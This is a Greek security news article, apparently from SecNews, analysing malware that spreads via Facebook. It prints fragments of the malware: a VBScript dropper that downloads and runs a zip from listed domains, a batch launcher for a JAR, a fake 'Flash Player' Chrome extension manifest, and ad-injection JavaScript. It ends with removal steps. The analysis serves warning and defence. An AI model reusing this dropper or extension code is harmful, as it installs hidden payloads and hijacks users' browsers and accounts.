Έλληνες hackers πίσω από τον ιο του Facebook! Στόχος το οικονομικό όφελος μέσω διαφημίσεων σε ανυποψίαστους χρήστες!!
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
Dim csPATH : csPATH = CreateObject(“WScript.Shell”).ExpandEnvironmentStrings(“%SYSTEMDRIVE%”)
‘ Create a new folder
oFSO.CreateFolder csPATH
Do
download(csPATH)
Unzip csPATH &”\content.zip”, csPATH
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, link, False
xHttp.Send
.type = 1 ‘//binary
.open
.write xHttp.responseBody
.savetofile csPATH &”\content.zip”, 2 ‘//overwrite
end with
download = csPATH &”\content.zip”
End Function
Dim fso, msg
Set fso = CreateObject(“Scripting.FileSystemObject”)
If (fso.FileExists(filespec)) Then
msg = 1
Else
msg = 0
End If
ReportFileStatus = msg
End Function
sites=Array(“http://xionobala.com/mermikia/moisis.zip”,”http://trendvidz.com/terlix/filezilla.zip”,
max=UBound(sites)
min=LBound(sites)
Randomize
a=Int((max-min+1)*Rnd+min)
RandomLink = sites(a)
End Function
Set oFSO = CreateObject(“Scripting.FileSystemObject”)
if not oFSO.FolderExists(sTargetDir) then oFSO.CreateFolder(sTargetDir)
Set oShell = CreateObject(“Shell.Application”)
Set oSource = oShell.NameSpace(sSource).Items()
Set oTarget = oShell.NameSpace(sTargetDir)
oTarget.CopyHere oSource, 256
End Sub
WshShell.RUN “cmd /c “& csPATH &”\run.bat” , 2
- Κατεβάζει από ιστοσελίδες που διαθέτουν οι hackers ένα zip αρχείο.Όλα περιέχουν την ίδια backdoor αλλά έχουν διαφορετικά ονόματα για αποπροσανατολισμό.
- H λήψη πραγματοποιείται από μία από τις 10 τυχαίες IP διευθύνσεις ιστοσελίδων που έχουν δημιουργήσει γιαυτό το σκοπό οι hackers.
- Αποσυμπιέζει το αρχείο, ελέγχοντας αν αποσυμπιέστηκε επιτυχώς το κύριο αρχείο-malware
- Εκτελεί το run.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
|
@ECHO OFF
IFEXIST“%CommonProgramFiles(x86)%\java”gotojavaexists
IFEXIST“%CommonProgramFiles%\java”gotojavaexists
:installjava
start/w%SYSTEMDRIVE%\MyFolderakis\jre-8u5-windows-i586-iftw.exe/s
if%ERRORLEVEL%==0gotojavaexists
echo Please do not close this or windows installation will be corrupted…
echo Loading…
gotoinstalljava
:javaexists
start%SYSTEMDRIVE%\MyFolderakis\sapsalo.jar
|
- Το κακόβουλο λογισμικό αντιγράφει τον εαυτό του στο “Startup” φάκελο του υπολογιστή. Έτσι σε κάθε επανεκκίνηση εγκαθιστά τον εαυτό του. Ακόμα και αν το διαγράψετε θα το ξαναβρίσκετε στον browser σας.
- Τοποθετεί επίσης ένα αντίγραφο του στον φάκελο Chrome, με όνομα ext_folder.zip.
- Πραγματοποιεί λήψη του ourt.json (Παρακάτω)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
|
{
“olmpkfnhkfomcmnodekbphlkkejkealf”:{
“active_permissions”:{
“api”:["storage","tabs"],
“explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"],
“manifest_permissions”:[ ],
“scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
},
“content_settings”:[ ],
“creation_flags”:1,
“events”:[ ],
“from_bookmark”:false,
“from_webstore”:false,
“granted_permissions”:{
“api”:["storage","tabs"],
“explicit_host”:["\u003Call_urls>","chrome://favicon/*","http://*/*"],
“manifest_permissions”:[ ],
“scriptable_host”:["\u003Call_urls>","http://*.facebook.com/*","https://*.facebook.com/*"]
},
“incognito_content_settings”:[ ],
“incognito_preferences”:{
},
“initial_keybindings_set”:true,
“install_time”:“13042160431700495″,
“location”:1,
“manifest”:{
“background”:{
“persistent”:false,
“scripts”:["analytics.js"]
},
“content_scripts”:[{
"css":["jquery-ui.css"],
“js”:["debug_mode.js","jquery.js","jquery-ui.js","sugar.min.js","popup.js"],
“matches”:["http://*.facebook.com/*","https://*.facebook.com/*"],
“run_at”:“document_end”
},{
“all_frames”:true,
“exclude_matches”:["http://*.facebook.com/*","https://*.facebook.com/*"],
“js”:["debug_mode.js","sugar.min.js","URI.js","ads-list.js","ads.js"],
“matches”:["\u003Call_urls>"]
}],
“content_security_policy”:“script-src ‘self’ https://ssl.google-analytics.com; object-src ‘self’”,
“description”:“Cross-platform plugin plays animations, videos and sound files”,
“icons”:{
“128″:“128.png”,
“16″:“16.png”,
“48″:“48.png”
},
“key”:“MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyRAUY/Q1HimRmGom
V9c9/UWlVmQToGeNZPIxlH5C+g7Ig8/HObGp3G6YqwMNtvG1LF6DgESq7HkuhZpEcrmLmDI8tXQh
5SuYpKJCRcPJhvtOvtYnFbLNPdhg7DN4ZU8v1qhcrSSGfzK8KWPNghsAfL/PEFaobzWH+ZRFQbMsu93
+u9WJFbcGtXT+Kqar7eWIiCeTACobSDbcfaZ1Cj5S0TEZPRtddWvUKSXG3+/wLz236ckZAnz7yzOw
9kBLJL+J3+xm01qhTMc2wv6G0R+zVbC3/UjJcTSdCdY5wGgKgJkDzJ/WNxaGJUXFbKRRsQ3zhe3Xr
KKK+2kcHOjy0dZapQIDAQAB”,
“manifest_version”:2,
“name”:“Flash Player”,
“permissions”:["tabs","\u003Call_urls>","storage","http://*/"],
“version”:“2.0″
},
“path”:“olmpkfnhkfomcmnodekbphlkkejkealf\\2.0_0″,
“preferences”:{
},
“regular_only_preferences”:{
},
“state”:1,
“was_installed_by_default”:false
}
}
|
- Αναφέρετε σαφώς συγκεκριμένο Google Analytics code, το UA-49290687-2.
- Ο κώδικας πραγματοποιεί λήψη λίστας διαφημίσεων απo URL τις οποίες και τοποθετεί στο Facebook page. Σαφώς δηλαδή γίνετε εμβολή διαφημίσεων (injection) στον browser του χρήστη εν αγνοία του μέσω του Plugin, κερδίζοντας χρήματα μέσω clicks και views. Ιδιαίτερη σημασία έχει η ελληνική ονοματοθεσία μεταβλητών! (πχ gegonos, diafimiseis sto fb) υποδηλώνοντας σαφώς ότι πρόκειται γιαΈλληνες εμπνευστές και εκτελεστές της συγκεκριμένης απάτης!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
|
$(function(){
chrome.runtime.sendMessage({gegonos:“visit”},function(response){});
//diafimiseis sto fb
chrome.storage.sync.get(function(extSettings){
if(extSettings.ads){
varadcounter=0;
varadurls=['https://8zxb-2gvn.accessdomain.com/789/ads.php',
'https://8zxb-2gvn.accessdomain.com/790/ads.php',
'https://8zxb-2gvn.accessdomain.com/791/ads.php',
'https://pizzasakis.com/789/ads.php','https://pizzasakis.com/790/ads.php',
'https://pizzasakis.com/791/ads.php'];
functiongetit(url){
$.get(url).done(function(b){
final_ad_url=url;
put_ads(final_ad_url);
}).fail(function(a,d,e){
console.log(‘fail’,adurls[adcounter])
if(adurls[adcounter++])
getit(adurls[adcounter])
});
}
getit(adurls[0]);
functionput_ads(final_ad_url){
$($(‘*[data-ad]‘)).parent().parent().html(‘
height: 620px; border:0;” src=”‘+final_ad_url+‘?choice=1″ id=”someId”/>’)
elems1=$.makeArray($(“*[data-dedupekey]“));
elems2=$.makeArray($(“*[data-insertion-position]“));
elems=elems1.include(elems2).unique();
if(elems[0])
$(elems[0]).append(‘
if(elems[1])
$(elems[1]).append(‘
}
}
})
})
|
Σε άλλο σημείο του κώδικα, ρουτίνα λαμβάνει την λίστα φίλων του χρήστη στο Facebook και πραγματοποιεί Like σε προκαθορισμένες σελίδες. Μέσω του Google Analytics code που εντοπίσαμε παραπάνω, οι hackers γνωρίζουν σε ποιον αποστείλατε το κακόβουλο μήνυμα, που έγινε η διασπορά του λογισμικού. Επιπλέον γνωρίζει σε ποιους έχει αποσταλεί το attachment και ποιοι το εκτέλεσαν!
Το σύνολο του κώδικα προς λήψη και ανάλυση από φίλους της ιστοσελίδας μπορείτε να βρείτε εδώ (κωδικός αποσυμπίεσης: malwaresos). ΠΡΟΣΟΧΗ ΚΑΤΑ ΤΗΝ ΛΗΨΗ ΤΟΥ – Ανοίξτε με NOTEPAD++
Πρόσθετα στοιχεία του SecNews – ΑΜΕΣΗ ΕΡΕΥΝΑ
Το ιδιαίτερα εντυπωσιακό είναι ότι το malware ΔΕΝ πραγματοποιεί κάποια κακόβουλη υποκλοπή κωδικών. Σύμφωνα με τα στοιχεία που έχουμε στην διάθεσή μας η δημιουργία του έγινε ΑΠΟΚΛΕΙΣΤΙΚΑ από Έλληνες προγραμματιστές/hackers με σκοπό τα κέρδη μέσω κακόβουλης διασποράς διαφημίσεων. Πρέπει να διερευνηθεί ΑΜΕΣΑ από τις αρχές αν η συγκεκριμένη ανάπτυξη λογισμικού έγινε από μεμονωμένα πρόσωπα για προσωπικό όφελος ή από τους ιδιοκτήτες των ιστοσελίδων που εμφανίζονται στον κώδικα, με σκοπό την μαζική αποκομιδή κερδών. Ο τρόπος ανάπτυξης του κώδικα υποδηλώνει υψηλή γνώστη προγραμματισμού με χαρακτηριστικά διασποράς ιού, απόκρυψης από Antivirus και γενικότερα εξαιρετικά χαρακτηριστικά που δεν έχουμε συναντήσει ξανά. Δεν είναι σαφές αν έχει αναπτυχθεί από ένα ή περισσότερα άτομα.
Ο ερευνητής-φίλος της ιστοσελίδας MCMC εντόπισε επιπλέον κάποια domains που πραγματοποιούν διασπορά του λογισμικού (ΜΗΝ ΚΑΝΕΤΕ ΛΗΨΗ ΤΩΝ ZIP)
sites=Array(“http://xionobala.
Τα domains όπως αναφέρει είναι registered από την domainsbyproxy.com , οι οποίοι κάνουν registerdomains και κρατούν την ανωνυμία του owner ενώ έχουν την ίδια αρχική σελίδα και τρόπο δόμησης (κενά sites με paths με malware).
Οι αρχές οφείλουν να διερευνήσουν ΑΜΕΣΑ τα παραπάνω domains ώστε να εξακριβώσουν την προέλευση της διασποράς αλλά και τους δημιουργούς του λογισμικού. Ήδη τα θύματα είναι εκατοντάδες, σύμφωνα με τις πλέον πρόσφατες συντηρητικές εκτιμήσεις.
Πρέπει να εξακριβωθεί αν τα ανωτέρω sites χρησιμοποιήθηκαν εν αγνοία των ιδιοκτητών τους ως διασπορείς του malware ή αυτές καθεαυτές οι ιστοσελίδες δημιουργήθηκαν εξ αρχής από τους hackers-ηλεκτρονικούς απατεώνες. Επιπλέον οι ISP’s πρέπει ΑΜΕΣΑ να πραγματοποιήσουν περιορισμό πρόσβασης στις ως άνω ιστοσελίδες!
Απομάκρυνση του ιού
Η τεχνική ομάδα του SecNews χαρακτηρίζει μετά την ανάλυση, τον κώδικα ως ιδιαιτέρως έξυπνο και αποτελεσματικό, με χρήση πολλαπλών τεχνολογιών ! Παρ’ ολαυτα υπάρχουν ελλείψεις που ο/οι προγραμματιστές , δεν πρόσεξαν υποδηλώνοντας το γνωστικό επίπεδο των δημιουργών. Για παράδειγμα αν ο υπολογιστής έχει έναν φάκελο “MyFolderakias” το script θα σταματήσει την εκτέλεσή του! Επιπλέον έχουν παρατηρηθεί σφάλματα κατά την εγκατάσταση της Java σε περίπτωση μη ύπαρξής της. Τέλος ο σχεδιασμός του ιού στοχοποιεί κυρίως Windows 7 και όχι XP (!).
Δεν μπορεί να γίνει αντιληπτό ποιος/ποιοί θα είχαν όφελος στην διασπορά διαφημίσεων με χρήση Malware, κάτι που φυσικά αποτελεί σημαντικότατο στοιχείο προς διερεύνηση από τις αρχές. Σύμφωνα με δημοσιογραφικές πληροφορίες, λόγω του μεγάλου αριθμού θυμάτων της απάτης ήδη η Δίωξη Ηλεκτρονικού Εγκλήματος της ΕΛ.ΑΣ διεξάγει βαθιά έρευνα για την αρχική προέλευση των μηνυμάτων καθώς και τους δημιουργούς του ιού που στόχευε σε οικονομικά οφέλη από διαφημίσεις. Οι ίδιες πηγές αναφέρουν ότι σύντομα θα υπάρξουν εξελίξεις.
Όπως αναφέρουν τακτικοί αναγνώστες του SecNews, υπάρχουν μάλιστα εταιρείες που πραγματοποιούν το λεγόμενο “Blackhat SEO” ,χρησιμοποιώντας παρανόμως αντίστοιχες μεθόδους με malware, ώστε να αυξήσουν την επισκεψιμότητα ιστοσελίδων πελατών τους άμεσα και γρήγορα και κατ’ επέκταση τα ενδεχόμενα έσοδά τους από clicks και Facebook likes.
Η απομάκρυνση του ίου είναι (παραδόξως) ιδιαιτέρως απλή!
- Αφαιρείτε το plugin από τον Browser ( Firefox: https://support.mozilla.org/en-US/kb/disable-or-remove-add-onsChrome: https://support.google.com/chrome/answer/113907?hl=en. Ελέγξτε για ύπαρξη plugins/Extensions με την ονομασία Flash ή που δεν αναγνωρίζετε
- Αφαιρείτε από το startup folder το αρχείο JAR που έχει προστεθεί. (Δείτε σχετικά http://www.wikihow.com/Change-Startup-Programs-in-Windows-7)
Το SecNews ευχαριστεί το www.safer-internet.gr και τον ανεξάρτητο ερευνητή ασφάλειας MCMC για την έγκαιρη, έγκυρη και αντικειμενική ενημέρωση.
ΠΗΓΗ:SecNews
COMMENTS